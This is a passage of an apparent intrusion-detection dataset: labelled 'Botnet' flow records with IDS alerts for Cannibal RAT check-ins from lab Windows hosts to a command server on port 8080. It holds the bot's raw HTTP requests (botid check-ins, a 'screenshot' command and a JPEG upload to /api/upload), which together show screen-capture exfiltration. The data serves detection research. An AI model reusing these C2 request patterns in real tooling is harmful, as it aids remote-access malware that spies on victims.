['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:31.694181+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobt1AAIAGTkPAqAoPza6lScwkH5Bi7AHMgP6GRlARAQAZcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:31.797253+0000', 'flow_id': 1657958509811621, 'pcap_cnt': 4489027, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52260, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:31.694181+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobt1AAIAGTkPAqAoPza6lScwkH5Bi7AHMgP6GRlARAQAZcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,242 |
192.168.10.9-2574-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 554, flow_bytes_toclient: 433, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4491182, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4491184, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:36 | 226,153 | Friday | [{'timestamp': '2017-07-07T13:26:37.132748+0000', 'flow_id': 1266377751845475, 'pcap_cnt': 4491182, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2574, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:36.907875+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoM3RAAIAGibLAqAoJza6lSQoOH5DU3Fe0TwO17VAQAQAWCwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:37.132748+0000', 'flow_id': 1266377751845475, 'pcap_cnt': 4491182, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2574, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:36.907875+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoM3RAAIAGibLAqAoJza6lSQoOH5DU3Fe0TwO17VAQAQAWCwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 510 | attack | 1,249,308 |
192.168.10.9-2575-205.174.165.73-8080-6 | ['flow', 'anomaly', 'anomaly', 'anomaly', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 39, flow_pkts_toclient: 79, flow_bytes_toserver: 193083, flow_bytes_toclient: 4868, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: ET.formdata, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4491324, event_type: anomaly, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, anomaly_app_proto: http, anomaly_type: applayer, anomaly_event: METHOD_DELIM_NON_COMPLIANT, anomaly_layer: proto_parser ; pcap_cnt: 4491324, event_type: anomaly, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, anomaly_app_proto: http, anomaly_type: applayer, anomaly_event: REQUEST_FIELD_MISSING_COLON, anomaly_layer: proto_parser ; pcap_cnt: 4491324, event_type: anomaly, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, anomaly_app_proto: http, anomaly_type: applayer, anomaly_event: REQUEST_HEADER_INVALID, anomaly_layer: proto_parser ; pcap_cnt: 4491326, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, http_http_port: 0, http_url: \xe4=\x8d\xcf\xb8X\xb9\xff | false | Botnet | true | 13:26:37 | 96,633 | Friday | [] | 958 | attack | 1,249,321 |
192.168.10.14-51600-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 555, flow_bytes_toclient: 433, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4493145, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4493147, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:40 | 185,447 | Friday | [{'timestamp': '2017-07-07T13:26:40.540914+0000', 'flow_id': 1827751452504311, 'pcap_cnt': 4493145, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51600, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:40.356599+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGRVAAIAGpAzAqAoOza6lScmQH5CoOXvVrYfX/VAQAQDecAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:40.540914+0000', 'flow_id': 1827751452504311, 'pcap_cnt': 4493145, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51600, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:40.356599+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGRVAAIAGpAzAqAoOza6lScmQH5CoOXvVrYfX/VAQAQDecAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 507 | attack | 1,249,361 |
192.168.10.14-51601-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 22, flow_pkts_toclient: 35, flow_bytes_toserver: 58798, flow_bytes_toclient: 2228, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4493225, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 ; event_type: fileinfo, proto: TCP, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0, app_proto: http, fileinfo_filename: wbzVJ.jpg, fileinfo_gaps: False, fileinfo_state: TRUNCATED, fileinfo_stored: False, fileinfo_size: 5246, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:40 | 79,175 | Friday | {'timestamp': '2017-07-07T13:26:40.603173+0000', 'flow_id': 148582448508529, 'pcap_cnt': 4493170, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51601, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['ET.formdata', 'http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/upload', 'http_user_agent': 'python-requests/2.18.1', 'http_method': 'POST', 'protocol': 'HTTP/1.1', 'length': 0, 'http_request_body_printable': '--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="src"\r\n\r\nwbzVJ.jpg\r\n--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc5\r\n--4febb587bbce4febb8e65c6e36950c90\r\nContent-Disposition: form-data; name="uploaded"; filename="wbzVJ.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.......t.&..1%.....=.A..?.D.F..]...*N..t..N........5.6..$...C..........,,...}.A.K#....$.rx...%.+z.$.j-?5.5..|K....g..2......b......p..@$..j.k..y;g..t.......r....=8...E.+.....2....E$.....$....)^G...bph.\'...].y2yb/.....w...F3.1...6(../_.T.5;.....e.....8(.....[......M.)...', 'http_request_body': 'LS00ZmViYjU4N2JiY2U0ZmViYjhlNjVjNmUzNjk1MGM5MA0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzcmMiDQoNCndielZKLmpwZw0KLS00ZmViYjU4N2JiY2U0ZmViYjhlNjVjNmUzNjk1MGM5MA0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJib3RpZCINCg0KbWl0YWNzLXBjNQ0KLS00ZmViYjU4N2JiY2U0ZmViYjhlNjVjNmUzNjk1MGM5MA0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGxvYWRlZCI7IGZpbGVuYW1lPSJ3YnpWSi5qcGciDQoNCv/Y/+AAEEpGSUYAAQEAAAEAAQAA/9sAQwAIBgYHBgUIBwcHCQkICgwUDQwLCwwZEhMPFB0aHx4dGhwcICQuJyAiLCMcHCg3KSwwMTQ0NB8nOT04MjwuMzQy/9sAQwEJCQkMCwwYDQ0YMiEcITIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy/8AAEQgDAAQAAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMBAQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUhMQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQACEQMRAD8A9GooooAKKKuSw6oL9NN0jybdljElzeyoHKk9FUH/AD+VROpGFr9dF5mlKk6krXS82U6K0LAC+gmt7zWdNv7zJMD2xUOQB/EAf5Csm7u4LCynvLl9kEEbSyPgnaqjJOByeB2q7SXxK3qRJJNqLT81sTUVknxLpYaAGWfMwDL/AKLL8qlioZ/l+RSQcM2AQCQSBmrCaxYSeTtnz5109pH8jcypv3L07eW/PTjryKBF6iseDxTotzIUjvMARST75InRGiTG5wzAKV5HzA4PYnBoHifTDAJd13kyeWIvsM/mk7d3EezeRjPOMcHmgDYorI0vX4tU1TU7FLe4jaxlEe+SGRQ4KK2csoAOWxjJyAG6EU0eKdHa4g=='}, 'files': [{'filename': 'wbzVJ.jpg', 'sid': [], 'gaps': False, 'state': 'UNKNOWN', 'stored': False, 'size': 865, 'tx_id': 0}], 'app_proto': 'http', 'flow': {'pkts_toserver': 5, 'pkts_toclient': 2, 'bytes_toserver': 9048, 'bytes_toclient': 126, 'start': '2017-07-07T13:26:40.601713+0000'}, 'payload': 'UE9TVCAvYXBpL3VwbG9hZCBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTguMQ0KQ29udGVudC1MZW5ndGg6IDU3MzE4DQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTRmZWJiNTg3YmJjZTRmZWJiOGU2NWM2ZTM2OTUwYzkwDQoNCi0tNGZlYmI1ODdiYmNlNGZlYmI4ZTY1YzZlMzY5NTBjOTANCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3JjIg0KDQp3YnpWSi5qcGcNCi0tNGZlYmI1ODdiYmNlNGZlYmI4ZTY1YzZlMzY5NTBjOTANCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iYm90aWQiDQoNCm1pdGFjcy1wYzUNCi0tNGZlYmI1ODdiYmNlNGZlYmI4ZTY1YzZlMzY5NTBjOTANCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBsb2FkZWQiOyBmaWxlbmFtZT0id2J6VkouanBnIg0KDQr/2P/gABBKRklGAAEBAAABAAEAAP/bAEMACAYGBwYFCAcHBwkJCAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/bAEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMv/AABEIAwAEAAMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APRqKKKACiirksOqC/TTdI8m3ZYxJc3sqBypPRVB/wA/lUTqRha/XReZpSpOpK10vNlOitCwAvoJre81nTb+8yTA9sVDkAfxAH+QrJu7uCwsp7y5fZBBG0sj4J2qoyTgcngdqu0l8St6kSSTai0/NbE1FZJ8S6WGgBlnzMAy/wCiy/KpYqGf5fkUkHDNgEAkEgZqwmsWEnk7Z8+ddPaR/I3Mqb9y9O3lvz0468igReorHg8U6LcyFI7zAEUk++SJ0RokxucMwCleR8wOD2JwaB4n0wwCXdd5MnliL7DP5pO3dxHs3kYzzjHB5oA2KKyNL1+LVNU1OxS3uI2sZRHvkhkUOCitnLKADlsYycgBuhFNHinR2uI=', 'payload_printable': 'POST /api/upload HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: 